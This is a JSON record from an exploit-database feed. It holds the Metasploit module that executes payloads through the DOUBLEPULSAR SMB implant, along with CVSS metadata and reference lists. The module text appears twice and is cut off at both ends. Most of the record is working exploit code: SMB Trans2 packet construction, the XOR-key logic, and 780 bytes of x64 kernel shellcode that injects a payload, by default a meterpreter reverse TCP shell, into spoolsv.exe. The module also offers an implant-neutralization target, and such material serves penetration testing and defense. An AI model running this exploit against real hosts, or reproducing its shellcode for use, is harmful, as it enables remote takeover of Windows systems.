simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-24] #"}, "lastseen": "2021-09-23T22:16:05", "differentElements": ["sourceData"], "edition": 24}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "437f74e38249c68c6f9f777dc61e9974", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-25T00:21:39", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42030", 
"EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0147", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96703", "SMNTC-96709"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-25T00:21:39", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-25T00:21:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module 
requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 
'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n 